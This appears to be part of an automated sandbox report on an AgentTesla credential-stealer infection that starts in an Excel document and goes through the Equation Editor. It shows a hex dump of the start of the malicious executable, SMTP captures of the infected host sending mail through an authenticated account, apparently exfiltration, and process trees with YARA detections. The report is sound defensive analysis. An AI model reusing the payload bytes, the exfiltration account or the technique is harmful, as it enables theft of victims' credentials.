                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1120768
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-msdownload
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 8e c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 8a 0c 00 00 8e 04 00 00 00 00 00 3e a9 0c 00 00 20 00 00 00 c0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 a8 0c 00 4b 00 00 00 00 c0 0c 00 00 8b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 0c 00 00 00 a2 a8 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 89 0c 00 00 20 00 00 00 8a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 8b 04 00 00 c0 0c 00 00 8c 04 00 00 8c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 11 00 00 02 00 00 00 18 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 a9 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 27 01 00 e8 04 01 00 03 00 00 00 01 00 00 06 f4 2b 02 00 ae 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 14 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bf 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 28 06 00 00 06 28 05 00 00 06 39 9c 00 00 00 26 20 04 00 00 00 38 67 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 17 3a 55 00 00 00 26 02 16 28 08 00 00 06 20 01 00 00 00 28 05 00 00 06 3a 3e 00 00 00 26 02 16 28 07 00 00 06 20 06 00 00 00 38 2c 00 00 00 02 16 28 11 00 00 0a 20 05 00 00 00 16 39 1a 00 00 00 26 02 16 28 09 00 00 06 38 32 00 00 00 20 04 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 9e ff ff ff c2 ff ff ff af ff ff ff 00 00 00 00 9e ff ff ff 74 ff ff ff 87 ff ff ff 10 00 00 00 38 aa ff ff ff 26 20 02 00 00 00 38 cb ff ff ff 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0e 00 00 06 28 0f 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 12 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 13 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 15 00 00 0a 2a 00 2e 2b 02 26 16 00 28 16 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 6f 22 00 00 06 2a 00 4a 2b 02 26 16 fe 09 00 00 fe
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL]`> @ @K` H.textD `.rsrc@@.reloc`@B H'+|j+&(((o*0+&+&((9& 8g( :U&( (:>&( 8,( 9&(82 Et8& 8*V+&(((*V+&(((*+&*+&*J+&(*J+&(*J+&(*J+&(*.+&(*:+&o"*J+&


                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Jun 16, 2021 12:22:26.973731041 CEST58749166148.66.138.106192.168.2.22220-sg3plcpnl0096.prod.sin3.secureserver.net ESMTP Exim 4.93 #2 Wed, 16 Jun 2021 03:22:26 -0700
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Jun 16, 2021 12:22:26.974232912 CEST49166587192.168.2.22148.66.138.106EHLO 783875
                                                                    Jun 16, 2021 12:22:27.268367052 CEST58749166148.66.138.106192.168.2.22250-sg3plcpnl0096.prod.sin3.secureserver.net Hello 783875 [84.17.52.18]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-CHUNKING
                                                                    250-STARTTLS
                                                                    250-SMTPUTF8
                                                                    250 HELP
                                                                    Jun 16, 2021 12:22:27.270143986 CEST49166587192.168.2.22148.66.138.106AUTH login c2FsZXM1QGFsa2hhbGVlamF1dG9wYXJ0cy5jb20=
                                                                    Jun 16, 2021 12:22:27.562062025 CEST58749166148.66.138.106192.168.2.22334 UGFzc3dvcmQ6
                                                                    Jun 16, 2021 12:22:27.858735085 CEST58749166148.66.138.106192.168.2.22235 Authentication succeeded
                                                                    Jun 16, 2021 12:22:27.859620094 CEST49166587192.168.2.22148.66.138.106MAIL FROM:<sales5@alkhaleejautoparts.com>
                                                                    Jun 16, 2021 12:22:28.152915001 CEST58749166148.66.138.106192.168.2.22250 OK
                                                                    Jun 16, 2021 12:22:28.153232098 CEST49166587192.168.2.22148.66.138.106RCPT TO:<lisafury29@safina.cc>
                                                                    Jun 16, 2021 12:22:28.445422888 CEST58749166148.66.138.106192.168.2.22250 Accepted
                                                                    Jun 16, 2021 12:22:28.445713997 CEST49166587192.168.2.22148.66.138.106DATA
                                                                    Jun 16, 2021 12:22:28.737297058 CEST58749166148.66.138.106192.168.2.22354 Enter message, ending with "." on a line by itself
                                                                    Jun 16, 2021 12:22:28.743681908 CEST49166587192.168.2.22148.66.138.106.
                                                                    Jun 16, 2021 12:22:29.046072960 CEST58749166148.66.138.106192.168.2.22250 OK id=1ltSgm-00FDWs-Ht
                                                                    Jun 16, 2021 12:22:30.428925037 CEST58749167148.66.138.106192.168.2.22220-sg3plcpnl0096.prod.sin3.secureserver.net ESMTP Exim 4.93 #2 Wed, 16 Jun 2021 03:22:30 -0700
                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                    220 and/or bulk e-mail.
                                                                    Jun 16, 2021 12:22:30.429297924 CEST49167587192.168.2.22148.66.138.106EHLO 783875
                                                                    Jun 16, 2021 12:22:30.707295895 CEST58749167148.66.138.106192.168.2.22250-sg3plcpnl0096.prod.sin3.secureserver.net Hello 783875 [84.17.52.18]
                                                                    250-SIZE 52428800
                                                                    250-8BITMIME
                                                                    250-PIPELINING
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-CHUNKING
                                                                    250-STARTTLS
                                                                    250-SMTPUTF8
                                                                    250 HELP
                                                                    Jun 16, 2021 12:22:30.707587004 CEST49167587192.168.2.22148.66.138.106AUTH login c2FsZXM1QGFsa2hhbGVlamF1dG9wYXJ0cy5jb20=
                                                                    Jun 16, 2021 12:22:30.985790014 CEST58749167148.66.138.106192.168.2.22334 UGFzc3dvcmQ6
                                                                    Jun 16, 2021 12:22:31.270421982 CEST58749167148.66.138.106192.168.2.22235 Authentication succeeded
                                                                    Jun 16, 2021 12:22:31.270809889 CEST49167587192.168.2.22148.66.138.106MAIL FROM:<sales5@alkhaleejautoparts.com>
                                                                    Jun 16, 2021 12:22:31.550159931 CEST58749167148.66.138.106192.168.2.22250 OK
                                                                    Jun 16, 2021 12:22:31.550559044 CEST49167587192.168.2.22148.66.138.106RCPT TO:<lisafury29@safina.cc>
                                                                    Jun 16, 2021 12:22:31.831468105 CEST58749167148.66.138.106192.168.2.22250 Accepted
                                                                    Jun 16, 2021 12:22:31.831796885 CEST49167587192.168.2.22148.66.138.106DATA
                                                                    Jun 16, 2021 12:22:32.109935999 CEST58749167148.66.138.106192.168.2.22354 Enter message, ending with "." on a line by itself
                                                                    Jun 16, 2021 12:22:32.955218077 CEST58749167148.66.138.106192.168.2.22250 OK id=1ltSgp-00FDYr-UE

                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: EXCEL.EXE PID: 2596 Parent PID: 584

                                                                    General

                                                                    Start time:12:20:44
                                                                    Start date:16/06/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                    Imagebase:0x13f820000
                                                                    File size:27641504 bytes
                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: EQNEDT32.EXE PID: 2392 Parent PID: 584

                                                                    General

                                                                    Start time:12:21:06
                                                                    Start date:16/06/2021
                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                    Imagebase:0x400000
                                                                    File size:543304 bytes
                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: vbc.exe PID: 2908 Parent PID: 2392

                                                                    General

                                                                    Start time:12:21:09
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\Public\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                    Imagebase:0xad0000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: vbc.exe PID: 1980 Parent PID: 2908

                                                                    General

                                                                    Start time:12:21:11
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\Public\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\Public\vbc.exe
                                                                    Imagebase:0xad0000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: tnvLnx.exe PID: 1664 Parent PID: 1388

                                                                    General

                                                                    Start time:12:21:41
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: tnvLnx.exe PID: 152 Parent PID: 1664

                                                                    General

                                                                    Start time:12:21:42
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: tnvLnx.exe PID: 764 Parent PID: 1388

                                                                    General

                                                                    Start time:12:21:49
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe'
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Analysis Process: tnvLnx.exe PID: 2564 Parent PID: 764

                                                                    General

                                                                    Start time:12:21:52
                                                                    Start date:16/06/2021
                                                                    Path:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
                                                                    Imagebase:0x210000
                                                                    File size:1120768 bytes
                                                                    MD5 hash:42520170FE48AF70B3711BF86BDE77B0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >